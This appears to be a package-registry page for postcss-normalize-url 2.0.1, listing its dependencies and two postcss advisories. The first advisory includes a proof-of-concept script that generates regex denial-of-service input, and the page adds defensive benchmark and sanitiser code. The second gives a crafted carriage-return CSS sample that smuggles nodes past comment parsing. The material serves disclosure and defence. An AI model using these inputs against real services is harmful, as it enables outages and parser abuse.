PostCSS Normalize URL is a PostCSS plugin that cleans up and standardizes the URLs found in your CSS stylesheets. Version 2.0.1 is a minor update over the previous stable release, 2.0.0; the core URL-normalization behaviour is unchanged. Both versions pull in the same dependencies: postcss for CSS parsing and transformation, normalize-url for URL manipulation, object-assign for copying object properties, is-absolute-url for checking whether a URL is absolute, and css-list for parsing comma-separated lists of values.
The only difference lies in the css-list dependency. Version 2.0.0 depends on css-list 0.0.3, while 2.0.1 moves to css-list 0.1.0. That css-list update likely addresses bug fixes or minor enhancements in how comma-separated value lists are split, which can improve the plugin's accuracy or stability on more complex CSS syntax.
For developers, upgrading to 2.0.1 therefore offers a potentially more robust experience, especially when stylesheets contain complex comma-separated value lists. Both versions are MIT-licensed, so they can be freely used and modified. The plugin is authored by Ben Briggs, and the source code is available on GitHub for transparency and community contributions.
All vulnerabilities related to version 2.0.1 of the package
Both entries below are in the postcss dependency rather than in postcss-normalize-url itself; whether a given project is exposed depends on which postcss version its lockfile actually resolves.
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, and in versions from 8.0.0 up to but not including 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are driven mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a stylesheet with n source-map annotation openers and no closing "*/",
// so every candidate comment fails to match and the regex backtracks.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse of a benign, well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Grow the attack input and print how long each parse takes; the time
// rises super-linearly with attack_str.length on affected versions.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
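As an added example (not the advisory's PoC and not postcss's own source), the script below shows why an annotation regex built around the sub-pattern above backtracks quadratically on the PoC's input, and contrasts it with the linear scan the upstream fix moved to: match only the short fixed prefix, then locate the comment end with indexOf. The two extractor functions, the version-range helper and the benchmark are this example's own illustrative code; the attack builder reproduces the PoC's input. It needs only Node.js, no postcss install.

```javascript
// Added example (not the advisory's PoC and not postcss source): why the
// annotation regex is quadratic on the PoC input, and the linear alternative.

// --- Affected-range check for the resolved postcss version ---
// Ranges as stated in the advisory: before 7.0.36, or 8.0.0 up to 8.2.13.
function parseVersion(v) {
  // Accepts "8.2.12" or "8.2.12-beta.1"; pre-release suffixes are ignored here.
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(v);
  if (!m) throw new Error("unparseable version: " + v);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compareVersions(a, b) {
  const x = parseVersion(a);
  const y = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  }
  return 0;
}

function isRedosAffected(version) {
  const before = (v, w) => compareVersions(v, w) < 0;
  return before(version, "7.0.36") ||
    (!before(version, "8.0.0") && before(version, "8.2.13"));
}

// --- The PoC's attack input: many annotation openers, no closing "*/" ---
function buildAttack(n) {
  let css = "a{}";
  for (let i = 0; i < n; i++) css += "/*# sourceMappingURL=";
  return css + "!";
}

// --- Regex extraction built around the advisory's sub-pattern ---
// Illustrative shape, not the exact regex of any postcss release. For each
// "/*" in the input the lazy (.*?) is extended one character at a time and
// "\s*\*\/" is retried after every step; with n openers and no "*/" that is
// roughly n * (remaining length) steps, i.e. O(n^2).
const ANNOTATION_VULNERABLE = /\/\*\s*# sourceMappingURL=(.*?)\s*\*\//gm;

function loadAnnotationRegex(css) {
  const all = css.match(ANNOTATION_VULNERABLE);
  if (!all) return null;
  const last = all[all.length - 1];
  return last
    .replace(/^\/\*\s*# sourceMappingURL=/, "")
    .replace(/\s*\*\/$/, "")
    .trim();
}

// --- Linear extraction in the style of the upstream fix ---
// Only the short fixed prefix is matched by regex; the comment end is found
// with indexOf, so no pattern ever backtracks across the body of the input.
const ANNOTATION_START = /\/\*\s*# sourceMappingURL=/gm;

function loadAnnotationLinear(css) {
  const starts = css.match(ANNOTATION_START);
  if (!starts) return null;
  const start = css.lastIndexOf(starts[starts.length - 1]); // last annotation wins
  const end = css.indexOf("*/", start);
  if (start < 0 || end < 0) return null; // unterminated comment: no map to load
  return css.slice(start, end).replace(/^\/\*\s*# sourceMappingURL=/, "").trim();
}

// --- Measure both extractors on growing attack inputs ---
function timeMs(fn, css) {
  const t0 = process.hrtime.bigint();
  fn(css);
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

function benchmark(sizes) {
  return sizes.map((n) => {
    const css = buildAttack(n);
    return {
      n,
      length: css.length,
      regexMs: timeMs(loadAnnotationRegex, css),
      linearMs: timeMs(loadAnnotationLinear, css),
    };
  });
}

// Constructed benign input (the PoC's warm-up string).
const SAMPLE_CSS = "a{}/*# sourceMappingURL=a.css.map */";

console.log("postcss 8.2.12 affected:", isRedosAffected("8.2.12"));
console.log("annotation:", loadAnnotationLinear(SAMPLE_CSS));
// Sizes kept small on purpose; the regexMs column grows roughly 4x per doubling
// while linearMs stays flat.
console.table(benchmark([200, 400, 800, 1600]));
```

Run it with `node` and compare the two timing columns. The linear version keeps the same semantics on well-formed input (the last annotation in the file wins, the URL is trimmed) but returns null immediately for the PoC's unterminated comments instead of backtracking across the whole stylesheet. Feed `isRedosAffected()` the version printed by `npm ls postcss`, not the range declared in package.json, since it is the resolved version that runs.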
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts which PostCSS parses as a CSS comment. After processing by PostCSS, those parts end up in the PostCSS output as CSS nodes (rules, properties) despite originally sitting inside a comment.
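The following added example is not from PostCSS or the advisory. It shows the check a linter author can run before handing untrusted CSS to a PostCSS older than 8.4.31: apply the input preprocessing that CSS Syntax Module Level 3 prescribes (CRLF, a lone CR and FF each become LF, NUL becomes U+FFFD), which removes the bare \r the sample above depends on, and report every lone CR with its position so the input can be flagged rather than silently parsed. The function names and the strict/normalise policy are this example's own; the sample string is the advisory's.

```javascript
// Added example (not PostCSS or advisory code): pre-parse hygiene for
// untrusted CSS handed to a PostCSS older than 8.4.31.

// CSS Syntax Module Level 3, "Preprocessing the input stream": CRLF, a lone
// CR and FF are each replaced by a single LF, and NUL by U+FFFD. After this
// step no bare "\r" can reach the tokenizer.
function preprocessCss(input) {
  return input.replace(/\r\n?|\f/g, "\n").replace(/\0/g, "\uFFFD");
}

// Report every CR that is not the first half of a CRLF pair, with its
// 1-based line/column and the surrounding characters (JSON-escaped so the
// "\r" stays visible in a log line).
function findLoneCarriageReturns(input) {
  const hits = [];
  let line = 1;
  let column = 1;
  for (let i = 0; i < input.length; i++) {
    const ch = input[i];
    if (ch === "\n") {
      line++;
      column = 1;
    } else if (ch === "\r") {
      if (input[i + 1] === "\n") continue; // CRLF: the LF does the line counting
      hits.push({
        index: i,
        line,
        column,
        context: JSON.stringify(input.slice(Math.max(0, i - 8), i + 8)),
      });
      line++;
      column = 1;
    } else {
      column++;
    }
  }
  return hits;
}

// Policy hook for a linter (this example's own design): either reject the
// input outright ("strict") or return the normalised text together with the
// findings so the caller can warn and continue.
function prepareUntrustedCss(input, { strict = false } = {}) {
  const findings = findLoneCarriageReturns(input);
  if (strict && findings.length > 0) {
    throw new Error(
      "lone CR at line " + findings[0].line + ", column " + findings[0].column
    );
  }
  return { css: preprocessCss(input), findings };
}

// The advisory's demonstration input, written out with the bare CR.
const ADVISORY_SAMPLE = "@font-face{ font:(\r/*);}";

const sampleResult = prepareUntrustedCss(ADVISORY_SAMPLE);
console.log(sampleResult.findings);            // one hit: index 18, line 1, column 19
console.log(JSON.stringify(sampleResult.css)); // "@font-face{ font:(\n/*);}"
```

Normalising line endings is defence in depth, not a substitute for upgrading postcss to 8.4.31 or later: it removes the specific \r discrepancy the advisory describes, and the findings list tells you which inputs were relying on it.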